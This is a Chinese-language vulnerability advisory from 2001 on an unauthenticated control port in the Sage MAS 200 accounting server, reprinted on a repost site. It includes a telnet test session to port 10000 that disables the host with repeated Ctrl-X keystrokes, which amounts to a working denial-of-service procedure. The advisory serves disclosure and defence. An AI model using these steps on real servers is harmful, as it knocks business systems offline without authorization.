MAS 200帐号服务器未授权访问漏洞

发布日期：2001-08-21
更新日期：2001-08-22

受影响系统：

Sage Software MAS 200

描述：

---

Sage Software 的MAS 200 是一个帐号服务器平台，它可以被配置程允许通过TCP/IP
远程访问服务器端的数据。一个主机应用程序监听到服务器的链接，所有的客户端都
使用一个工作站应用程序与主机通信。

由于主机应用程序缺乏对访问者的权限控制，任何用户都可以直接连上其监听端口，执
行控制命令，例如禁止提供服务。

这可能造成拒绝服务攻击或者攻击者控制MAS 200服务器。

<*来源：Administrator (Administrator@jfdi.com) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Administrator (Administrator@jfdi.com)提供了如下测试代码：

telnet x.x.x.x port: 10000

Connected...

<enter>

"The host does not support this application"

<control x> X 10 <enter>

"The host has been disabled"...

exit

telnet x.x.x.x port: 10000

Connected...

<enter>

"The host has been disabled"...



建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.us.sage.com/

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有